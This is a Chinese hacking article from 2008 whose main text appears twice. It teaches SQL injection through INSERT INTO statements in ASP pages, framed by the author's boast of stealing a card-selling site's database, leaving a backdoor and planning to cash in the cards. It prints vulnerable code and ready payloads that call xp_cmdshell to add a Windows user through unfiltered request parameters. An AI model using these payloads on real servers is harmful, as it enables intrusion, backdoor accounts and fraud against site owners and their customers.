巧用数据库insert Into进行入侵注入
互联网 发布时间:2008-10-08 19:38:01 作者:佚名
我要评论
刚才到了酷吧,坐在收银台旁边和收银的MM聊了几句话;
突然看到"电影影线"有张海报,上面写着:
凡是购买该站点卡密码最后一位数是6或7便可获赠面值5元的易卡一张;
我想,这个网站整个数据在我手里,我要是把那几十万张卡全拿去换钱不是发达了?
刚才到了酷吧,坐在收银台旁边和收银的MM聊了几句话;
突然看到"电影影线"有张海报,上面写着:
凡是购买该站点卡密码最后一位数是6或7便可获赠面值5元的易卡一张;
我想,这个网站整个数据在我手里,我要是把那几十万张卡全拿去换钱不是发达了?
随即马上到他服务器把库拿下来,顺便在服务器上再留个后门;
在过程中有另一个想法便是本文的重要点;利用insert Into 进行注入。
============================================= 关于SQL注入,以前常用的或很多朋友所懂的也只不过是在select 语句中ID=变量未过产生的注入点,例如http://www.gzint.com/xxx.asp?id=1 ;exec master..xp_cmdshell "net user xiaomo aa /add"-- ============================================= 我们可否利用insert Into Table的语句进行注入呢?
这样的话,我们可以在某某有漏洞的网站上填写QQ或Email或地址的地方执行任何命令了哦.
记得以前粗略地和"乱刀"讨论过,不过一直没有实际行动,刚才发现了一下,原来真的可以做到这一点。呵呵。举下例: 某个页面xiaomo.asp中有如下一句代码: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’"&Request("u")&"’)"
我们可以利用Request("U")未过滤的变量执行任意系统命令. 这段很简单,Request("U")在语句后面,直接提交: http://localhost/xiaomo.asp?u=2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
便可添加一个xiaomo密码为aa的系统用户 因为构造的代码变成了: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
当然理所当然地"正确"执行了。 ============================================= 我们换个思路,如果页面中的漏洞代码是: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’"&Request("u")&"’,’1’,’1’,’1’,’1’)"
Request("u")跑到前面去了,这该怎么办呢? 其实也很简单,变通一下即可,提交: http://localhost/xiaomo.asp?u=3’,’1’,’1’,’1’,’1’);exec master..xp_cmdshell "net user xiaomo aa /add"----
看出来了没?第一个变量代表了要写入的所有变量,而后面就不而而至了,哈哈。。 但有个问题是,我们必须得知道对方语句是怎么写,利在检查指定程序漏洞时所应用
============================================= 关于SQL注入,以前常用的或很多朋友所懂的也只不过是在select 语句中ID=变量未过产生的注入点,例如http://www.gzint.com/xxx.asp?id=1 ;exec master..xp_cmdshell "net user xiaomo aa /add"-- ============================================= 我们可否利用insert Into Table的语句进行注入呢?
这样的话,我们可以在某某有漏洞的网站上填写QQ或Email或地址的地方执行任何命令了哦.
记得以前粗略地和"乱刀"讨论过,不过一直没有实际行动,刚才发现了一下,原来真的可以做到这一点。呵呵。举下例: 某个页面xiaomo.asp中有如下一句代码: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’"&Request("u")&"’)"
我们可以利用Request("U")未过滤的变量执行任意系统命令. 这段很简单,Request("U")在语句后面,直接提交: http://localhost/xiaomo.asp?u=2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
便可添加一个xiaomo密码为aa的系统用户 因为构造的代码变成了: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
当然理所当然地"正确"执行了。 ============================================= 我们换个思路,如果页面中的漏洞代码是: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’"&Request("u")&"’,’1’,’1’,’1’,’1’)"
Request("u")跑到前面去了,这该怎么办呢? 其实也很简单,变通一下即可,提交: http://localhost/xiaomo.asp?u=3’,’1’,’1’,’1’,’1’);exec master..xp_cmdshell "net user xiaomo aa /add"----
看出来了没?第一个变量代表了要写入的所有变量,而后面就不而而至了,哈哈。。 但有个问题是,我们必须得知道对方语句是怎么写,利在检查指定程序漏洞时所应用
相关文章
CC主要是用来攻击页面的,大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,对不?!一般来说,访问的人越多,论坛的页2024-01-06
入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以2021-04-15
这篇文章主要介绍了文件上传漏洞全面渗透分析小结,这里主要为大家分享一下防御方法,需要的朋友可以参考下2021-03-21- 这篇文章主要介绍了sql手工注入语句&SQL手工注入大全,需要的朋友可以参考下2017-09-06
- 这篇文章主要介绍了详解Filezilla server 提权,需要的朋友可以参考下2017-05-13
FileZilla Server 2008 x64 提权与防御方法
这篇文章主要介绍了FileZilla Server 2008 x64 提权与防御方法,需要的朋友可以参考下2017-05-13- 不久之前我们说过关于http和https的区别,对于加密的https,我们一直认为它是相对安全的,可今天要讲的是,一种绕过HTTPS加密得到明文信息的web攻击方式,不知道这消息对你2016-08-10
iPhone和Mac也会被黑 一条iMessage密码可能就被盗了
一直以来苹果系统的安全性都是比安卓要高的,但是再安全的系统也免不了漏洞,苹果也一样。最近爆出的新漏洞,只需要接收一条多媒体信息或者iMessage就会导致用户信息泄露。2016-07-27- 国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的“世纪佳缘”起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯·卡兰尼克账号被盗,于是黑2016-07-11
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱2016-07-06



最新评论